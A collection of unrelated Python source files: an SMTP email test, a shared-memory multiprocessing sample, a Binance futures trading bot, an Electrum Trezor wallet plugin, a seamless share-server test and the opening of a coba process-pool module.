self.assertEqual(configuration.get('smtp', 'SMTP_MAIL_FROM'), msg['From'])
self.assertEqual(2, len(msg.get_payload()))
self.assertEqual(u'attachment; filename="' + os.path.basename(attachment.name) + '"',
msg.get_payload()[-1].get(u'Content-Disposition'))
mimeapp = MIMEApplication('attachment')
self.assertEqual(mimeapp.get_payload(), msg.get_payload()[-1].get_payload())
@mock.patch('smtplib.SMTP_SSL')
@mock.patch('smtplib.SMTP')
def test_send_mime(self, mock_smtp, mock_smtp_ssl):
mock_smtp.return_value = mock.Mock()
mock_smtp_ssl.return_value = mock.Mock()
msg = MIMEMultipart()
utils.email.send_MIME_email('from', 'to', msg, dryrun=False)
mock_smtp.assert_called_with(
configuration.get('smtp', 'SMTP_HOST'),
configuration.getint('smtp', 'SMTP_PORT'),
)
self.assertTrue(mock_smtp.return_value.starttls.called)
mock_smtp.return_value.login.assert_called_with(
configuration.get('smtp', 'SMTP_USER'),
configuration.get('smtp', 'SMTP_PASSWORD'),
)
mock_smtp.return_value.sendmail.assert_called_with('from', 'to', msg.as_string())
self.assertTrue(mock_smtp.return_value.quit.called)
@mock.patch('smtplib.SMTP_SSL')
@mock.patch('smtplib.SMTP')
def test_send_mime_ssl(self, mock_smtp, mock_smtp_ssl):
configuration.set('smtp', 'SMTP_SSL', 'True')
mock_smtp.return_value = mock.Mock()
mock_smtp_ssl.return_value = mock.Mock()
utils.email.send_MIME_email('from', 'to', MIMEMultipart(), dryrun=False)
self.assertFalse(mock_smtp.called)
mock_smtp_ssl.assert_called_with(
configuration.get('smtp', 'SMTP_HOST'),
configuration.getint('smtp', 'SMTP_PORT'),
)
@mock.patch('smtplib.SMTP_SSL')
@mock.patch('smtplib.SMTP')
def test_send_mime_noauth(self, mock_smtp, mock_smtp_ssl):
configuration.conf.remove_option('smtp', 'SMTP_USER')
configuration.conf.remove_option('smtp', 'SMTP_PASSWORD')
mock_smtp.return_value = mock.Mock()
mock_smtp_ssl.return_value = mock.Mock()
utils.email.send_MIME_email('from', 'to', MIMEMultipart(), dryrun=False)
self.assertFalse(mock_smtp_ssl.called)
mock_smtp.assert_called_with(
configuration.get('smtp', 'SMTP_HOST'),
configuration.getint('smtp', 'SMTP_PORT'),
)
self.assertFalse(mock_smtp.login.called)
@mock.patch('smtplib.SMTP_SSL')
@mock.patch('smtplib.SMTP')
def test_send_mime_dryrun(self, mock_smtp, mock_smtp_ssl):
utils.email.send_MIME_email('from', 'to', MIMEMultipart(), dryrun=True)
self.assertFalse(mock_smtp.called)
self.assertFalse(mock_smtp_ssl.called)
if __name__ == '__main__':
unittest.main()
|
multiprocessing_sharedctypes.py
|
"""
「マルチプロセス」の節で登場するサンプルコード
sharedctypesサブモジュールを使ってプロセス間でデータを共有する方法
"""
from multiprocessing import Process, Value, Array
def f(n, a):
n.value = 3.1415927
for i in range(len(a)):
a[i] = -a[i]
if __name__ == '__main__':
num = Value('d', 0.0)
arr = Array('i', range(10))
p = Process(target=f, args=(num, arr))
p.start()
p.join()
print(num.value)
print(arr[:])
|
bot.py
|
try:
import unicorn_binance_rest_api
except ImportError:
print("Please install `unicorn-binance-rest-api`! https://pypi.org/project/unicorn-binance-rest-api/")
sys.exit(1)
binance_com_api_key = ...
binance_com_api_secret = ...
from unicorn_binance_websocket_api.unicorn_binance_websocket_api_manager import BinanceWebSocketApiManager
from unicorn_binance_rest_api.unicorn_binance_rest_api_manager import BinanceRestApiManager
import logging
import time
import threading
import os
import math
import random
import numpy as np
# https://docs.python.org/3/library/logging.html#logging-levels
logging.basicConfig(level=logging.INFO,
filename=os.path.basename(__file__) + '.log',
format="{asctime} [{levelname:8}] {process} {thread} {module}: {message}",
style="{")
def print_stream_data_from_stream_buffer(binance_websocket_api_manager):
while True:
if binance_websocket_api_manager.is_manager_stopping():
exit(0)
oldest_stream_data_from_stream_buffer = binance_websocket_api_manager.pop_stream_data_from_stream_buffer()
if oldest_stream_data_from_stream_buffer is False:
time.sleep(0.01)
else:
print(oldest_stream_data_from_stream_buffer)
'''SYMBOL PARAMETERS'''
symbol = ... #символ
pr_p=... #округление цены
pr_s=... #округление сайза
# create instances of BinanceWebSocketApiManager
binance_com_websocket_api_manager = BinanceWebSocketApiManager(exchange="binance.com-futures",
throw_exception_if_unrepairable=True,
stream_buffer_maxlen=100, output_default='dict')
binance_com_rest_api_manager = BinanceRestApiManager(api_key=binance_com_api_key, api_secret=binance_com_api_secret)
# # create the userData streams
binance_com_user_data_stream_id = binance_com_websocket_api_manager.create_stream('arr', '!userData',
api_key=binance_com_api_key,
api_secret=binance_com_api_secret,
output="UnicornFy",
stream_buffer_name='user')
# create the bookticker streams
bookTicker_arr_stream_id = binance_com_websocket_api_manager.create_stream(["bookTicker"], markets=symbol,
stream_buffer_name='book')
# start a worker process to move the received stream_data from the stream_buffer to a print function
worker_thread = threading.Thread(target=print_stream_data_from_stream_buffer, args=(binance_com_websocket_api_manager,))
worker_thread.start()
# monitor the streams
# preparation for trading
wap = 0
spread = 0
wap_window = []
spread_window = []
for i in range(8):
data = binance_com_rest_api_manager.futures_orderbook_ticker(symbol=symbol)
a = float(data.get('askPrice'))
b = float(data.get('bidPrice'))
A = float(data.get('askQty'))
B = float(data.get('bidQty'))
spread = a - b
wap = (a * B + b * A) / (A + B)
wap_window.append(wap)
spread_window.append(spread)
std_spread = np.std(spread_window)
std_wap = np.std(wap_window)
print("Я ВСЁ ПОСЧИТАЛ НАЧАЛЬНИК")
'''основные параметры'''
min_size = 100
std_spread = np.std(spread_window)
mean_spread = np.mean(spread_window)
'''параметры символа'''
symbol = 'celrusdt'
pr_p=5
pr_s=0
curr_pos = 0
pos = 0
avg_price = 0
mpu = 700 # max pose usd
mos = 0.025 # max order size as % of mpu
price_buy = round(min(wap * 0.9990, wap - mean_spread * (1 + std_spread)) , pr_p)
price_sell = round(max(wap * 1.0010, wap + mean_spread * (1 + std_spread)) , pr_p)
size = math.floor(mos * mpu / wap)
d_flag = 0 #flag on dokupka
#create first trading orders
print('СТАВЛЮ ОРДЕРА, ПОГНАЛИ')
start=time.time()
binance_com_rest_api_manager.futures_create_order(symbol=symbol, quantity=size, type='LIMIT', side='BUY',
newClientOrderId='SimpleBuy1', price=price_buy, timeInForce='GTC')
finish=time.time()-start
print('delay',finish)
start=time.time()
binance_com_rest_api_manager.futures_create_order(symbol=symbol, quantity=size, type='LIMIT', side='SELL',
newClientOrderId='SimpleSell1', price=price_sell, timeInForce='GTC')
finish=time.time()-start
print('delay',finish)
print('ПОСТАВИЛ, УРА МЫ БАНКРОТЫ')
while True:
msg2 = binance_com_websocket_api_manager.pop_stream_data_from_stream_buffer(stream_buffer_name='book', mode='LIFO')
if msg2:
if msg2.get('stream') is not None:
del wap_window[0]
del spread_window[0]
a = float(msg2.get('data').get('a'))
b = float(msg2.get('data').get('b'))
A = float(msg2.get('data').get('A'))
B = float(msg2.get('data').get('B'))
wap = (a*B+b*A)/(A+B)
spread = a - b
wap_window.append(wap)
spread_window.append(spread)
std_spread = np.std(spread_window)
std_wap = np.std(wap_window)
size = round((mos*mpu/wap)*(1+(curr_pos/mpu)), pr_s)
curr_pos = abs(pos) * avg_price
price_buy = round(min(wap * 0.9980, wap*0.9980*(1-std_wap) - spread * (1 + std_spread)), pr_p)
price_sell = round(max(wap * 1.0020, wap*1.0010*(1+std_wap) + spread * (1 + std_spread)), pr_p)
msg1 = binance_com_websocket_api_manager.pop_stream_data_from_stream_buffer(stream_buffer_name='user',mode='LIFO')
if msg1:
if curr_pos < mpu:
if msg1.get('stream_type') == 'ACCOUNT_UPDATE' and len(msg1.get('positions')) > 0: #quick fix index error on pos
pos = float(msg1.get('positions')[0].get('position_amount')) #get current position
tp_size=max(min_size,abs(pos))
avg_price = round(float(msg1.get('positions')[0].get('entry_price')) , pr_p)
avg_price_sell = round(float(msg1.get('positions')[0].get('entry_price')) * 0.9980, pr_p) #get position average price
avg_price_buy = round(float(msg1.get('positions')[0].get('entry_price')) * 1.0020, pr_p)
if pos < 0: #sell triggered
new_size = max(min_size, round(size * random.uniform(0.8, 1),pr_s))
i=random.randrange(1,10)
binance_com_rest_api_manager.futures_cancel_all_open_orders(symbol=symbol)
binance_com_rest_api_manager.futures_create_order(symbol=symbol,type='LIMIT',quantity = tp_size, side ='BUY',
newClientOrderId='SellTP',price=avg_price_sell, timeInForce='GTC')
binance_com_rest_api_manager.futures_create_order(symbol=symbol,type='LIMIT',quantity=new_size, side='SELL',
newClientOrderId=f'SimpleSell{i}',price=price_sell, timeInForce='GTC')
print("Short")
if pos > 0: #buy triggered
new_size = max(min_size, round(size * random.uniform(0.8, 1),pr_s))
i = random.randrange(1, 10)
binance_com_rest_api_manager.futures_cancel_all_open_orders(symbol=symbol)
binance_com_rest_api_manager.futures_create_order(symbol=symbol,type='LIMIT',quantity=tp_size, side ='SELL',
newClientOrderId='BuyTP',price=avg_price_buy, timeInForce='GTC')
binance_com_rest_api_manager.futures_create_order(symbol=symbol,type='LIMIT',quantity=new_size, side='BUY',
newClientOrderId=f'SimpleBuy{i}',price=price_buy, timeInForce='GTC')
print("Long")
if pos == 0: # flat triggered
new_size = max(min_size, round(size * random.uniform(0.8, 1),pr_s))
binance_com_rest_api_manager.futures_cancel_all_open_orders(symbol=symbol)
start=time.time()
binance_com_rest_api_manager.futures_create_order(symbol=symbol, type='LIMIT', quantity=new_size, side='BUY',
newClientOrderId='SimpleBuy', price=price_buy, timeInForce='GTC')
finish = time.time() - start
print('delay', finish)
binance_com_rest_api_manager.futures_create_order(symbol=symbol, type='LIMIT', quantity=new_size, side='SELL',
newClientOrderId='SimpleSell', price=price_sell, timeInForce='GTC')
print("Flat")
elif curr_pos >= mpu:
if msg1.get('stream_type') == 'ACCOUNT_UPDATE' and len(msg1.get('positions')) > 0: #quick fix index error on pos
pos = float(msg1.get('positions')[0].get('position_amount')) #get current position
tp_size=max(min_size,(pos))
avg_price = round(float(msg1.get('positions')[0].get('entry_price')) , pr_p)
avg_price_sell = round(float(msg1.get('positions')[0].get('entry_price')) * 0.9980, pr_p) #get position average price
avg_price_buy = round(float(msg1.get('positions')[0].get('entry_price')) * 1.0020, pr_p)
pass
|
trezor.py
|
from binascii import hexlify, unhexlify
import traceback
import sys
from electrum_btcc.util import bfh, bh2u, versiontuple, UserCancelled
from electrum_btcc.bitcoin import (b58_address_to_hash160, xpub_from_pubkey, deserialize_xpub,
TYPE_ADDRESS, TYPE_SCRIPT, is_address)
from electrum_btcc import constants
from electrum_btcc.i18n import _
from electrum_btcc.plugin import BasePlugin, Device
from electrum_btcc.transaction import deserialize, Transaction
from electrum_btcc.keystore import Hardware_KeyStore, is_xpubkey, parse_xpubkey
from electrum_btcc.base_wizard import ScriptTypeNotSupported
from ..hw_wallet import HW_PluginBase
from ..hw_wallet.plugin import is_any_tx_output_on_change_branch, trezor_validate_op_return_output_and_get_data
# TREZOR initialization methods
TIM_NEW, TIM_RECOVER, TIM_MNEMONIC, TIM_PRIVKEY = range(0, 4)
RECOVERY_TYPE_SCRAMBLED_WORDS, RECOVERY_TYPE_MATRIX = range(0, 2)
class TrezorKeyStore(Hardware_KeyStore):
hw_type = 'trezor'
device = 'TREZOR'
def get_derivation(self):
return self.derivation
def get_client(self, force_pair=True):
return self.plugin.get_client(self, force_pair)
def decrypt_message(self, sequence, message, password):
raise RuntimeError(_('Encryption and decryption are not implemented by {}').format(self.device))
def sign_message(self, sequence, message, password):
client = self.get_client()
address_path = self.get_derivation() + "/%d/%d"%sequence
address_n = client.expand_path(address_path)
msg_sig = client.sign_message(self.plugin.get_coin_name(), address_n, message)
return msg_sig.signature
def sign_transaction(self, tx, password):
if tx.is_complete():
return
# previous transactions used as inputs
prev_tx = {}
# path of the xpubs that are involved
xpub_path = {}
for txin in tx.inputs():
pubkeys, x_pubkeys = tx.get_sorted_pubkeys(txin)
tx_hash = txin['prevout_hash']
if txin.get('prev_tx') is None and not Transaction.is_segwit_input(txin):
raise Exception(_('Offline signing with {} is not supported for legacy inputs.').format(self.device))
prev_tx[tx_hash] = txin['prev_tx']
for x_pubkey in x_pubkeys:
if not is_xpubkey(x_pubkey):
continue
xpub, s = parse_xpubkey(x_pubkey)
if xpub == self.get_master_public_key():
xpub_path[xpub] = self.get_derivation()
self.plugin.sign_transaction(self, tx, prev_tx, xpub_path)
class TrezorPlugin(HW_PluginBase):
# Derived classes provide:
#
# class-static variables: client_class, firmware_URL, handler_class,
# libraries_available, libraries_URL, minimum_firmware,
# wallet_class, types
firmware_URL = 'https://wallet.trezor.io'
libraries_URL = 'https://github.com/trezor/python-trezor'
minimum_firmware = (1, 5, 2)
keystore_class = TrezorKeyStore
minimum_library = (0, 9, 0)
SUPPORTED_XTYPES = ('standard', 'p2wpkh-p2sh', 'p2wpkh', 'p2wsh-p2sh', 'p2wsh')
MAX_LABEL_LEN = 32
def __init__(self, parent, config, name):
HW_PluginBase.__init__(self, parent, config, name)
self.libraries_available = self.check_libraries_available()
if not self.libraries_available:
return
from . import client
from . import transport
import trezorlib.messages
self.client_class = client.TrezorClient
self.types = trezorlib.messages
self.DEVICE_IDS = ('TREZOR',)
self.transport_handler = transport.TrezorTransport()
self.device_manager().register_enumerate_func(self.enumerate)
def get_library_version(self):
import trezorlib
try:
return trezorlib.__version__
except AttributeError:
return 'unknown'
def enumerate(self):
devices = self.transport_handler.enumerate_devices()
return [Device(d.get_path(), -1, d.get_path(), 'TREZOR', 0) for d in devices]
def create_client(self, device, handler):
try:
self.print_error("connecting to device at", device.path)
transport = self.transport_handler.get_transport(device.path)
except BaseException as e:
self.print_error("cannot connect at", device.path, str(e))
return None
if not transport:
self.print_error("cannot connect at", device.path)
return
self.print_error("connected to device at", device.path)
client = self.client_class(transport, handler, self)
# Try a ping for device sanity
try:
client.ping('t')
except BaseException as e:
self.print_error("ping failed", str(e))
return None
if not client.atleast_version(*self.minimum_firmware):
msg = (_('Outdated {} firmware for device labelled {}. Please '
'download the updated firmware from {}')
.format(self.device, client.label(), self.firmware_URL))
self.print_error(msg)
if handler:
handler.show_error(msg)
else:
raise Exception(msg)
return None
return client
def get_client(self, keystore, force_pair=True):
devmgr = self.device_manager()
handler = keystore.handler
with devmgr.hid_lock:
client = devmgr.client_for_keystore(self, handler, keystore, force_pair)
# returns the client for a given keystore. can use xpub
if client:
client.used()
return client
def get_coin_name(self):
return "Testnet" if constants.net.TESTNET else "Bitcored"
def initialize_device(self, device_id, wizard, handler):
# Initialization method
msg = _("Choose how you want to initialize your {}.\n\n"
"The first two methods are secure as no secret information "
"is entered into your computer.\n\n"
"For the last two methods you input secrets on your keyboard "
"and upload them to your {}, and so you should "
"only do those on a computer you know to be trustworthy "
"and free of malware."
).format(self.device, self.device)
choices = [
# Must be short as QT doesn't word-wrap radio button text
(TIM_NEW, _("Let the device generate a completely new seed randomly")),
(TIM_RECOVER, _("Recover from a seed you have previously written down")),
(TIM_MNEMONIC, _("Upload a BIP39 mnemonic to generate the seed")),
(TIM_PRIVKEY, _("Upload a master private key"))
]
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
model = client.get_trezor_model()
def f(method):
import threading
settings = self.request_trezor_init_settings(wizard, method, model)
t = threading.Thread(target=self._initialize_device_safe, args=(settings, method, device_id, wizard, handler))
t.setDaemon(True)
t.start()
exit_code = wizard.loop.exec_()
if exit_code != 0:
# this method (initialize_device) was called with the expectation
# of leaving the device in an initialized state when finishing.
# signal that this is not the case:
raise UserCancelled()
wizard.choice_dialog(title=_('Initialize Device'), message=msg, choices=choices, run_next=f)
def _initialize_device_safe(self, settings, method, device_id, wizard, handler):
exit_code = 0
try:
self._initialize_device(settings, method, device_id, wizard, handler)
except UserCancelled:
exit_code = 1
except BaseException as e:
traceback.print_exc(file=sys.stderr)
handler.show_error(str(e))
exit_code = 1
finally:
wizard.loop.exit(exit_code)
def _initialize_device(self, settings, method, device_id, wizard, handler):
item, label, pin_protection, passphrase_protection, recovery_type = settings
if method == TIM_RECOVER and recovery_type == RECOVERY_TYPE_SCRAMBLED_WORDS:
handler.show_error(_(
"You will be asked to enter 24 words regardless of your "
"seed's actual length. If you enter a word incorrectly or "
"misspell it, you cannot change it or go back - you will need "
"to start again from the beginning.\n\nSo please enter "
"the words carefully!"),
blocking=True)
language = 'english'
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
if method == TIM_NEW:
strength = 64 * (item + 2) # 128, 192 or 256
u2f_counter = 0
skip_backup = False
client.reset_device(True, strength, passphrase_protection,
pin_protection, label, language,
u2f_counter, skip_backup)
elif method == TIM_RECOVER:
word_count = 6 * (item + 2) # 12, 18 or 24
client.step = 0
if recovery_type == RECOVERY_TYPE_SCRAMBLED_WORDS:
recovery_type_trezor = self.types.RecoveryDeviceType.ScrambledWords
else:
recovery_type_trezor = self.types.RecoveryDeviceType.Matrix
client.recovery_device(word_count, passphrase_protection,
pin_protection, label, language,
type=recovery_type_trezor)
if recovery_type == RECOVERY_TYPE_MATRIX:
handler.close_matrix_dialog()
elif method == TIM_MNEMONIC:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_mnemonic(str(item), pin,
passphrase_protection,
label, language)
else:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_xprv(item, pin, passphrase_protection,
label, language)
def _make_node_path(self, xpub, address_n):
_, depth, fingerprint, child_num, chain_code, key = deserialize_xpub(xpub)
node = self.types.HDNodeType(
depth=depth,
fingerprint=int.from_bytes(fingerprint, 'big'),
child_num=int.from_bytes(child_num, 'big'),
chain_code=chain_code,
public_key=key,
)
return self.types.HDNodePathType(node=node, address_n=address_n)
def setup_device(self, device_info, wizard, purpose):
devmgr = self.device_manager()
device_id = device_info.device.id_
client = devmgr.client_by_id(device_id)
if client is None:
raise Exception(_('Failed to create a client for this device.') + '\n' +
_('Make sure it is in the correct state.'))
# fixme: we should use: client.handler = wizard
client.handler = self.create_handler(wizard)
if not device_info.initialized:
self.initialize_device(device_id, wizard, client.handler)
client.get_xpub('m', 'standard')
client.used()
def get_xpub(self, device_id, derivation, xtype, wizard):
if xtype not in self.SUPPORTED_XTYPES:
raise ScriptTypeNotSupported(_('This type of script is not supported with {}.').format(self.device))
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
client.handler = wizard
xpub = client.get_xpub(derivation, xtype)
client.used()
return xpub
def get_trezor_input_script_type(self, electrum_txin_type: str):
if electrum_txin_type in ('p2wpkh', 'p2wsh'):
return self.types.InputScriptType.SPENDWITNESS
if electrum_txin_type in ('p2wpkh-p2sh', 'p2wsh-p2sh'):
return self.types.InputScriptType.SPENDP2SHWITNESS
if electrum_txin_type in ('p2pkh', ):
return self.types.InputScriptType.SPENDADDRESS
if electrum_txin_type in ('p2sh', ):
return self.types.InputScriptType.SPENDMULTISIG
raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
def get_trezor_output_script_type(self, electrum_txin_type: str):
if electrum_txin_type in ('p2wpkh', 'p2wsh'):
return self.types.OutputScriptType.PAYTOWITNESS
if electrum_txin_type in ('p2wpkh-p2sh', 'p2wsh-p2sh'):
return self.types.OutputScriptType.PAYTOP2SHWITNESS
if electrum_txin_type in ('p2pkh', ):
return self.types.OutputScriptType.PAYTOADDRESS
if electrum_txin_type in ('p2sh', ):
return self.types.OutputScriptType.PAYTOMULTISIG
raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
def sign_transaction(self, keystore, tx, prev_tx, xpub_path):
self.prev_tx = prev_tx
self.xpub_path = xpub_path
client = self.get_client(keystore)
inputs = self.tx_inputs(tx, True)
outputs = self.tx_outputs(keystore.get_derivation(), tx)
signatures = client.sign_tx(self.get_coin_name(), inputs, outputs, lock_time=tx.locktime)[0]
signatures = [(bh2u(x) + '01') for x in signatures]
tx.update_signatures(signatures)
def show_address(self, wallet, address, keystore=None):
if keystore is None:
keystore = wallet.get_keystore()
if not self.show_address_helper(wallet, address, keystore):
return
client = self.get_client(keystore)
if not client.atleast_version(1, 3):
keystore.handler.show_error(_("Your device firmware is too old"))
return
change, index = wallet.get_address_index(address)
derivation = keystore.derivation
address_path = "%s/%d/%d"%(derivation, change, index)
address_n = client.expand_path(address_path)
xpubs = wallet.get_master_public_keys()
if len(xpubs) == 1:
script_type = self.get_trezor_input_script_type(wallet.txin_type)
client.get_address(self.get_coin_name(), address_n, True, script_type=script_type)
else:
def f(xpub):
return self._make_node_path(xpub, [change, index])
pubkeys = wallet.get_public_keys(address)
# sort xpubs using the order of pubkeys
sorted_pubkeys, sorted_xpubs = zip(*sorted(zip(pubkeys, xpubs)))
pubkeys = list(map(f, sorted_xpubs))
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=[b''] * wallet.n,
m=wallet.m,
)
script_type = self.get_trezor_input_script_type(wallet.txin_type)
client.get_address(self.get_coin_name(), address_n, True, multisig=multisig, script_type=script_type)
def tx_inputs(self, tx, for_sig=False):
inputs = []
for txin in tx.inputs():
txinputtype = self.types.TxInputType()
if txin['type'] == 'coinbase':
prev_hash = b"\x00"*32
prev_index = 0xffffffff # signed int -1
else:
if for_sig:
x_pubkeys = txin['x_pubkeys']
if len(x_pubkeys) == 1:
x_pubkey = x_pubkeys[0]
xpub, s = parse_xpubkey(x_pubkey)
xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
txinputtype._extend_address_n(xpub_n + s)
txinputtype.script_type = self.get_trezor_input_script_type(txin['type'])
else:
def f(x_pubkey):
if is_xpubkey(x_pubkey):
xpub, s = parse_xpubkey(x_pubkey)
else:
xpub = xpub_from_pubkey(0, bfh(x_pubkey))
s = []
return self._make_node_path(xpub, s)
pubkeys = list(map(f, x_pubkeys))
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=list(map(lambda x: bfh(x)[:-1] if x else b'', txin.get('signatures'))),
m=txin.get('num_sig'),
)
script_type = self.get_trezor_input_script_type(txin['type'])
txinputtype = self.types.TxInputType(
script_type=script_type,
multisig=multisig
)
# find which key is mine
for x_pubkey in x_pubkeys:
if is_xpubkey(x_pubkey):
xpub, s = parse_xpubkey(x_pubkey)
if xpub in self.xpub_path:
xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
txinputtype._extend_address_n(xpub_n + s)
break
prev_hash = unhexlify(txin['prevout_hash'])
prev_index = txin['prevout_n']
if 'value' in txin:
txinputtype.amount = txin['value']
txinputtype.prev_hash = prev_hash
txinputtype.prev_index = prev_index
if txin.get('scriptSig') is not None:
script_sig = bfh(txin['scriptSig'])
txinputtype.script_sig = script_sig
txinputtype.sequence = txin.get('sequence', 0xffffffff - 1)
inputs.append(txinputtype)
return inputs
def tx_outputs(self, derivation, tx):
def create_output_by_derivation():
script_type = self.get_trezor_output_script_type(info.script_type)
if len(xpubs) == 1:
address_n = self.client_class.expand_path(derivation + "/%d/%d" % index)
txoutputtype = self.types.TxOutputType(
amount=amount,
script_type=script_type,
address_n=address_n,
)
else:
address_n = self.client_class.expand_path("/%d/%d" % index)
pubkeys = [self._make_node_path(xpub, address_n) for xpub in xpubs]
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=[b''] * len(pubkeys),
m=m)
txoutputtype = self.types.TxOutputType(
multisig=multisig,
amount=amount,
address_n=self.client_class.expand_path(derivation + "/%d/%d" % index),
script_type=script_type)
return txoutputtype
def create_output_by_address():
txoutputtype = self.types.TxOutputType()
txoutputtype.amount = amount
if _type == TYPE_SCRIPT:
txoutputtype.script_type = self.types.OutputScriptType.PAYTOOPRETURN
txoutputtype.op_return_data = trezor_validate_op_return_output_and_get_data(o)
elif _type == TYPE_ADDRESS:
txoutputtype.script_type = self.types.OutputScriptType.PAYTOADDRESS
txoutputtype.address = address
return txoutputtype
outputs = []
has_change = False
any_output_on_change_branch = is_any_tx_output_on_change_branch(tx)
for o in tx.outputs():
_type, address, amount = o.type, o.address, o.value
use_create_by_derivation = False
info = tx.output_info.get(address)
if info is not None and not has_change:
index, xpubs, m = info.address_index, info.sorted_xpubs, info.num_sig
on_change_branch = index[0] == 1
# prioritise hiding outputs on the 'change' branch from user
# because no more than one change address allowed
# note: ^ restriction can be removed once we require fw
# that has https://github.com/trezor/trezor-mcu/pull/306
if on_change_branch == any_output_on_change_branch:
use_create_by_derivation = True
has_change = True
if use_create_by_derivation:
txoutputtype = create_output_by_derivation()
else:
txoutputtype = create_output_by_address()
outputs.append(txoutputtype)
return outputs
def electrum_tx_to_txtype(self, tx):
t = self.types.TransactionType()
if tx is None:
# probably for segwit input and we don't need this prev txn
return t
d = deserialize(tx.raw)
t.version = d['version']
t.lock_time = d['lockTime']
inputs = self.tx_inputs(tx)
t._extend_inputs(inputs)
for vout in d['outputs']:
o = t._add_bin_outputs()
o.amount = vout['value']
o.script_pubkey = bfh(vout['scriptPubKey'])
return t
# This function is called from the TREZOR libraries (via tx_api)
def get_tx(self, tx_hash):
tx = self.prev_tx[tx_hash]
return self.electrum_tx_to_txtype(tx)
|
simple-share.py
|
import seamless
from seamless.core import macro_mode_on
from seamless.core import context, cell, transformer, unilink, macro
from seamless.shareserver import shareserver
from seamless.core.share import sharemanager
from functools import partial
import websockets
import requests
import asyncio
import json
import time
shareserver_started = shareserver.start()
def define_ctx():
with macro_mode_on():
ctx = context(toplevel=True)
ctx.cell1 = cell().set(1)
ctx.cell2 = cell().set(2)
ctx.compute()
with macro_mode_on():
ctx.result = cell()
ctx.tf = transformer({
"a": "input",
"b": "input",
"c": "output"
})
ctx.cell1_unilink = unilink(ctx.cell1)
ctx.cell1_unilink.connect(ctx.tf.a)
ctx.cell2.connect(ctx.tf.b)
ctx.code = cell("transformer").set("c = a + b")
ctx.code.connect(ctx.tf.code)
ctx.result_unilink = unilink(ctx.result)
ctx.tf.c.connect(ctx.result_unilink)
return ctx
ctx = define_ctx()
ctx.compute()
name = sharemanager.new_namespace(ctx._get_manager(), True, name="ctx")
ctx.compute()
print("OK1", name)
print(ctx.cell1.value, ctx.cell2.value)
ctx.cell1.share(readonly=False)
ctx.cell2.share(readonly=False)
ctx.compute()
async def echo(uri):
async with websockets.connect(uri) as websocket:
async for message in websocket:
print("WS ECHO", message)
ws = echo('ws://localhost:5138/ctx')
asyncio.ensure_future(ws)
loop = asyncio.get_event_loop()
loop.run_until_complete(shareserver_started)
loop.run_until_complete(asyncio.sleep(0.1))
def thread(func, *args, **kwargs):
from threading import Thread
from queue import Queue
def func2(func, q, args, kwargs):
result = func(*args, **kwargs)
q.put(result)
q = Queue()
t = Thread(target=func2, args=(func, q, args, kwargs))
t.start()
while t.is_alive():
t.join(0.05)
loop.run_until_complete(asyncio.sleep(0.01))
return q.get()
r = thread(requests.get, 'http://localhost:5813/ctx/cell1')
print(r.json())
r = thread(
requests.put, 'http://localhost:5813/ctx/cell1',
data=json.dumps({"buffer": "20\n"})
)
r = thread(requests.get, 'http://localhost:5813/ctx/cell1')
print(r.json())
ctx.cell1.set(99)
loop.run_until_complete(asyncio.sleep(0.1))
r = thread(requests.get, 'http://localhost:5813/ctx/cell1')
print(r.json())
ctx._get_manager().destroy()
ctx = context(toplevel=True)
name = sharemanager.new_namespace(ctx._get_manager(), True, name="ctx")
print("OK2", name)
assert name == "ctx"
ws = echo('ws://localhost:5138/ctx')
asyncio.ensure_future(ws)
def macro_code(ctx, param_a):
ctx.a = cell().set(param_a + 1000)
ctx.a.share()
ctx.a0 = cell().set(999)
ctx.a0.share()
def define_ctx2():
ctx.macro = macro({"param_a": "int"})
ctx.macro.code.cell().set(macro_code)
ctx.param_a = cell().set(42)
ctx.param_a.share(readonly=False)
ctx.param_a.connect(ctx.macro.param_a)
define_ctx2()
import asyncio; asyncio.get_event_loop().run_until_complete(asyncio.ensure_future(asyncio.sleep(1)))
r = thread(
requests.patch, 'http://localhost:5813/ctx/compute',
json={"timeout": None}
)
print(r.text)
print(ctx.param_a.value)
print(ctx.macro.ctx.a.value)
r = thread(requests.get, 'http://localhost:5813/ctx/macro/ctx/a')
print(r.json())
print("OK3")
r = thread(
requests.put, 'http://localhost:5813/ctx/param_a',
data=json.dumps({"buffer": "43\n"})
)
print(r.json())
asyncio.get_event_loop().run_until_complete(asyncio.sleep(0.5)) # to get the request processed
print("OK3a")
ctx.compute()
print(ctx.param_a.value)
print("OK3b")
ctx.compute()
print(ctx.param_a.value)
print(ctx.macro.ctx.a.value)
|
multiprocessing.py
|
import time
import traceback
import pickle
import inspect
import collections.abc
from itertools import islice
from threading import Thread
from multiprocessing import current_process, Process, Queue
from typing import Iterable, Any, List, Optional, Dict
from coba.exceptions import CobaException
from coba.pipes.core import Pipes, Foreach, QueueIO
from coba.pipes.primitives import Filter, Source
from coba.pipes.sinks import Sink, ConsoleSink
# handle not picklable (this is handled by explicitly pickling) (TESTED)
# handle empty list (this is done by PipesPool naturally) (TESTED)
# handle exceptions in process (wrap worker executing code in an exception handler) (TESTED)
# handle ctrl-c without hanging
# > This is done by making PipesPool terminate inside its ContextManager.__exit__
# > This is also done by handling EOFError,BrokenPipeError in QueueIO since ctr-c kills multiprocessing.Pipe
# handle AttributeErrors. This occurs when... (this is handled PipePools.worker ) (TESTED)
# > a class that is defined in a Jupyter Notebook cell is pickled
# > a class that is defined inside the __name__=='__main__' block is pickled
# handle Experiment.evaluate not being called inside of __name__=='__main__' (this is handled by a big try/catch)
class PipesPool:
# Writing our own multiprocessing pool probably seems a little silly.
# However, Python's multiprocessing.Pool does a very poor job handling errors
# and it often gets stuck in unrecoverable states. Given that this package is
# meant to be used by a general audience who will likely have errors that need
# to be debugged as they learn how to use coba this was unacepptable. Therefore,
# after countless attempts to make multiprocessing.Pool work the decision was made
# to write our own so we could add our own helpful error messages.
def __enter__(self) -> 'PipesPool':
return self
def __exit__(self, exc_type, exc_value, traceback) -> None:
if exc_type is None:
self.close()
else:
self.terminate()
